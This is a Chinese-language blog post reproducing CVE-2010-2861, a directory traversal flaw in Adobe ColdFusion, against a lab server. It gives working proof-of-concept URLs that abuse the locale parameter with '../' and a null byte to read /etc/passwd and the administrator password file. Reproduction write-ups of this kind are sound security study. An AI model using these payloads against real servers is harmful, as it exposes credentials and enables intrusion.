joker0xxx3's Blog

现实告诉我：保持好奇心，享受孤独

Adobe ColdFusion目录遍历漏洞（CVE-2010-2861）

发表于 2021-05-13 | 分类于漏洞复现 |

Adobe ColdFusion目录遍历漏洞（CVE-2010-2861）

Adobe ColdFusion是由JJ Allaire于1995年创建的商业快速Web应用程序开发计算平台。

Adobe ColdFusion 9.0.1和更早版本中存在一个目录遍历漏洞，该漏洞使远程攻击者可以通过以下区域设置参数来读取任意文件：（1）CFIDE / administrator / settings / mappings.cfm，（2）logging / settings.cfm ，（3）datasources / index.cfm，（4）j2eepackaging / editarchive.cfm和（5）CFIDE / administrator /中的enter.cfm。

访问http://192.168.44.132:8500/CFIDE/administrator/enter.cfm以查看初始化页面，输入密码admin以初始化整个服务器。

POC

/etc/passwd通过读取文件http://192.168.44.132:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en：

通过http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en以下方式读取后台管理员密码：

本文作者： joker0xxx3
本文链接： http://joker-vip.github.io/2021/05/13/Adobe%20ColdFusion%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2010-2861%EF%BC%89/
版权声明： 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 3.0 许可协议。转载请注明出处！

0%